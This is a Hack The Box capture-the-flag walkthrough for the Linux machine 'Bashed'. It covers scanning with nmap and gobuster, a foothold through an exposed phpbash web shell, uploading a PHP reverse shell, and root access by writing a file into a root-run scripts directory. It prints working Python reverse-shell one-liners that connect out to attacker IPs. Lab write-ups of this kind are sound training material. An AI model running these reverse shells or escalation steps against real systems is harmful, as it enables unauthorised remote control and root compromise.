HTB - Bashed

Linux | phpbash

Tools For This Room

  • Pentestmonkey's PHP Reverse Shell - commonly used reverse shell - download it here

TL;DR / Executive Summary

  1. Scan and enumerate with nmap and gobuster

  2. Gain foothold with given phpbash

  3. Privesc by creating a file to spawn root shell

Scanning & Enumeration

We start off with nmap and gobuster as is tradition. However, we need to add the -Pn flag to get results from this room.

nmap -sV -sC -vv -Pn <IP>

Looks like we have a lone result. Running a full port scan in the background doesn't yield any further open ports. 80: HTTP

Let's browse to it and see what we can find:

We find Arrexel's Development Site, and exploring it leads us to Arrexel's github page with an explanation of phpbash.

"phpbash is a standalone, semi-interactive web shell. It's main purpose is to assist in penetration tests where traditional reverse shells are not possible." - Arrexel

This is a huge reveal of how we'll be getting a foothold. Let's enumerate further with gobuster first.

gobuster dir -u http://<IP> -w <wordlist)

Looks like we have quite a few directories to check out too.

Checking them out doesn't yield much, until we get to /dev.

Those are the exact file names in the github page. Looks like we won't need to find a way to upload the phpbash file, since it's already present.

Gaining Foothold

Simply clicking on "phpbash.php" brings us to this screen, which has a shell for us.

Navigating around, we find the user flag:

Privilege Escalation

As Arrexel's github page explained, this is a semi-interactive shell, which may limit our abilities. To solve this, let's try to get a reverse shell.

We can do this by uploading the fan-favorite pentestmonkey's reverse shell, which can be downloaded here. As always, we should read through and understand what the script is doing. So we'll notice we need to change the IP and port to our own.

To get our .php file to our victim machine, we need to host a server on the directory containing our .php file:

python -m SimpleHTTPServer

Then whip up our netcat listener to catch the shell:

nc -lvnp <port>

Now let's bring it over from the victim machine. But we need to navigate to a directory which allows us to do so, typically the /tmp directory works:

wget <ourIP>:<ourPort>/revshell.php

Browse to the URL to trigger it:

<IP>/uploads/revshell.php

Alternative for reverse shell

A simpler method to get a reverse shell is to simply use this command:

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.157",1235));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

This was found on 0xdf's walkthrough and is very much simpler than the initial method above. Great technique to add to our toolbox!

Time to stabilize our new shell:

python -c 'import pty;pty.spawn("/bin/bash")'
// ctrl + z //
stty raw -echo && fg
export TERM=xterm

We run the usual suspects to privesc such as history and SUIDs, and get an interesting hit when running "sudo -l".

This tells us that we can run commands as scriptmanager with our current user. Let's switch over to scriptmanager:

sudo -u scriptmanager /bin/bash

Checking out the / directory shows us a directory called scripts which sticks out as it's the only one not owned by root.

The scripts directory has 2 files:

Checking out test.py:

From this, we gather that test.py is writing to test.txt which is owned by root. What we'll do is create a python file which will spawn a root shell for us:

echo "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.10.14.9\",4443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);" > rev.py

Set up a netcat listener on our attacking machine to catch our root shell:

nc -lvnp 4443

After a minute or so, we're rewarded with our root shell!

Let's grab that flag:

PreviousHTB - ShockerNextHTB - Nibbles

Last updated

Was this helpful?